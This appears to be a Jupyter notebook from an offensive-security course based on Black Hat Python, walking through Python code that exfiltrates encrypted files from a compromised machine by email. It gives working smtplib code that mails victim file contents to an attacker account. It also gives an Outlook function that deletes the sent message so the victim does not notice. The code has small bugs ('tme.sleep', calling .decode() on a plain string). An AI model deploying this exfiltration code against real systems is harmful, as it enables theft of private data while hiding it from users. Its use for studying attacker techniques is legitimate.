<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C9-Fun_With_Exfiltration/Email_Exfiltration.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Email Exfiltration__*

Now that we can easily encrypt and decrypt information, let's write methods to exfiltrate the information we've encrypted. Open up __email_exfil.py__, which we'll use to send the encrypted information via email:

In [ ]:
import smtplib #[1]
import time
import win32com.client #[2]

smtp_server = 'smtp.example.com' #[3]
smtp_port = 587
smtp_acct = 'tim@example.com'
smtp_password = 'seKret'
tgt_accts = ['tim@elsewhere.com']

We import __smptlib__, which we need for the cross-platform email function __[1]__. We'll use the __win32com__ package to write our Windows-specific function __[2]__. To use the __SMTP__ email client, we need to connect to a Simple Mail Transfer Protocol (SMTP) server (an example might be __smtp.gmail.com__ if you have a Gmail account), so we specify the name of the server, the port on which it accepts connections, the account name, and the account password __[3]__. Next, let's write our platform-independent function __plain_email__:

In [ ]:
def plain_email(subject, contents):
    message = f'Subject: {subject}\nFrom {smtp_acct}\n' #[1]
    message += f'To: {tgt_accts}\n\n{contents.decode()}'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.starttls()
    server.login(smtp_acct, smtp_password) #[3]

    #server.set_debuglevel(1)
    server.sendmail(smtp_acct, tgt_accts, message) #[3]
    tme.sleep(1)
    server.quit()

The function takes __subject__ and __contents__ as input and then forms a message __[1]__ that incorporates the SMTP server data and message contents. The __subject__ will be the name of the file that contained the contents on the victim machine. The __contents__ will be the encrypted string returned from the __encrypt__ function. For added secrecy, you could send an encrypted string as the __subject__ of the message.

Next, we connect to the server and log in with the account name and password __[2]__. Then we invoke the __sendmail__ method with our account information as well as the target accounts to send the mail to, and, finally, the message itself __[3]__. If you have any problems with the function, you can set the __debuglevel__ attribute so you can see the connection on your console.
Now let's write a Windows-specific function to perform the same technique:

In [ ]:
def outlook(subject, contents): #[1]
    outlook = win32com.client.Dispatch('Outlook.Application') #[2]
    message = outlook.CreateItem(0)
    message.DeleteAfterSubmit = True #[3]
    message.Subject = subject
    message.Body = contents.decode()
    message.To = tgt_accts[0]
    message.Send() #[4]

The __outlook__ function takes the same arguments as the __plain_email__ function: __subject__ and __contents__ __[1]__. We use the __win32com__ package to create an instance of the Outlook application __[2]__, making sure that the email message is deleted immediately after submitting __[3]__. This ensures that the user on the compormised machine won't see the exfiltration email in the Sent Messages and Deleted Messages folders. Next, we populate the message subject, body, and target email address, and send the email off __[4]__.

In the main block, we call the __plain_email__ function to complete a short test of the functionality:

In [ ]:
if __name__ == '__main__':
    plain_email('test2 message', 'attack at dawn.')

After you use these functions to send an encrypted file to your attacker machine, you'll open your email client, select the message, and copy and paste it into a new file. You can then read from that file in order to decrypt it using the __decrypt__ function in __cryptor.py__.